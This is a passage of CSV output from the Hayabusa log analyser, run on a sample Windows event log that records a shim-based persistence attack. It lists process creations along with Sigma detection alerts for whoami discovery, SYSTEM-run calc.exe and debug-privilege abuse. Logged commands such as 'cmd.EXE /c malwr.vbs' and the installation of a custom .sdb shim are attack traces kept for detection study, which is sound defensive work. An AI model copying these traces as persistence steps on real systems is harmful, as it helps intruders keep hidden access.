+09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 